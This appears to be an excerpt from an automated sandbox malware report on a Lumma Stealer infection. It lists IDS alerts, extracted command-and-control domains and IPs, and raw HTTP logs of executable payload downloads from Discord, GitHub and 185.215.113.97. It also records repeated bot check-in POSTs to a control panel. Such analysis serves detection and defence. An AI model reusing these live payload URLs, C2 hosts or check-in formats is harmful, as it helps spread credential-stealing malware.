Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:51694 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.9:51694 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:51698 -> 188.114.96.3:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 140.82.121.3 443
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 93.88.203.169 39001
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 162.159.133.233 443
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 185.199.111.133 443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: importenptoc.com
Source: Malware configuration extractor	URLs: voicesharped.com
Source: Malware configuration extractor	URLs: inputrreparnt.com
Source: Malware configuration extractor	URLs: torpdidebar.com
Source: Malware configuration extractor	URLs: rebeldettern.com
Source: Malware configuration extractor	URLs: actiothreaz.com
Source: Malware configuration extractor	URLs: garulouscuto.com
Source: Malware configuration extractor	URLs: breedertremnd.com
Source: Malware configuration extractor	IPs: 185.215.113.43

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 93.88.203.169 ports 39001,0,1,56001,5,6

Uses ping.exe to check the status of other devices and networks

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost

Source: global traffic	TCP traffic: 192.168.2.9:51679 -> 93.88.203.169:56001
Source: global traffic	TCP traffic: 192.168.2.9:51780 -> 162.19.139.184:2222

Source: global traffic

TCP traffic: 192.168.2.9:51487 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 10 Feb 2025 18:50:08 GMTContent-Type: application/octet-streamContent-Length: 2168320Last-Modified: Sat, 08 Feb 2025 13:31:29 GMTConnection: keep-aliveETag: "67a75cb1-211600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1d e9 b6 df 59 88 d8 8c 59 88 d8 8c 59 88 d8 8c 33 94 da 8c 70 88 d8 8c 59 88 d9 8c 5b 88 d8 8c eb 94 c8 8c 5b 88 d8 8c 59 88 d8 8c 56 88 d8 8c e1 8e de 8c 58 88 d8 8c 52 69 63 68 59 88 d8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 45 5f 8e 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 de 00 00 00 b6 05 00 00 00 00 00 00 c0 4b 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 4b 00 00 04 00 00 21 06 22 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b f0 06 00 6f 00 00 00 00 e0 06 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 06 00 00 10 00 00 00 4a 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 48 04 00 00 00 e0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 06 00 00 02 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 00 07 00 00 02 00 00 00 60 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 70 75 68 68 64 76 67 00 90 1a 00 00 20 31 00 00 8c 1a 00 00 62 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 7a 72 74 6a 65 76 65 00 10 00 00 00 b0 4b 00 00 06 00 00 00 ee 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4b 00 00 22 00 00 00 f4 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 10 Feb 2025 18:50:14 GMTContent-Type: application/octet-streamContent-Length: 886272Last-Modified: Sun, 09 Feb 2025 18:32:00 GMTConnection: keep-aliveETag: "67a8f4a0-d8600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 f5 d0 36 46 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 2b 00 60 05 00 00 82 0d 00 00 04 00 00 c0 13 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 10 0e 00 00 04 00 00 f1 40 0d 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 0d 00 b8 14 00 00 00 90 0d 00 b0 65 00 00 00 c0 0c 00 10 20 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 ab 0c 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 54 0d 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 5e 05 00 00 10 00 00 00 60 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 50 01 00 00 00 70 05 00 00 02 00 00 00 64 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 20 30 07 00 00 80 05 00 00 32 07 00 00 66 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 10 20 00 00 00 c0 0c 00 00 22 00 00 00 98 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 a0 44 00 00 00 f0 0c 00 00 46 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 80 02 00 00 00 40 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 b8 14 00 00 00 50 0d 00 00 16 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 68 00 00 00 00 70 0d 00 00 02 00 00 00 16 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 80 0d 00 00 02 00 00 00 18 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 65 00 00 00 90 0d 00 00 66 00 00 00 1a 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 05 00 00 00 00 0e 00 00 06 00 00 00 80 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 10 Feb 2025 18:50:34 GMTContent-Type: application/octet-streamContent-Length: 414016Last-Modified: Mon, 10 Feb 2025 12:25:59 GMTConnection: keep-aliveETag: "67a9f057-65140"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c8 f2 43 da 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 f0 00 00 00 08 00 00 00 00 00 00 be 0e 01 00 00 20 00 00 00 20 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 0e 01 00 4b 00 00 00 00 20 01 00 98 05 00 00 00 00 00 00 00 00 00 00 00 0c 06 00 40 45 00 00 00 40 01 00 0c 00 00 00 21 0e 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 ee 00 00 00 20 00 00 00 f0 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 05 00 00 00 20 01 00 00 06 00 00 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 01 00 00 02 00 00 00 fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 64 61 74 61 00 00 00 10 05 00 00 60 01 00 00 10 05 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET /attachments/1336331746618376235/1337207374028738580/Sarcastic_Setup.exe?ex=67a69aea&is=67a5496a&hm=3b32825118cc0d524c597462379541f592a0aaa009acbf73f5e08d6fb678b84e& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raz23-bot/22/raw/refs/heads/main/plugin3.dll HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raz23-bot/22/raw/refs/heads/main/plugin3.dll HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raz23-bot/22/refs/heads/main/plugin3.dll HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raz23-bot/22/refs/heads/main/plugin3.dll HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: GET /files/1453454495/Fe36XBk.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 34 30 35 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1074057001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/5957639473/kUHbhqh.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 34 30 35 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1074058001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: GET /files/6875802221/Ryu8yUx.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 37 34 30 35 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1074059001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 30 32 41 37 33 42 34 35 45 38 32 44 31 32 46 44 36 36 36 42 33 33 33 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB02A73B45E82D12FD666B333B96DA0445166EF7A7D35B1E750864299
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
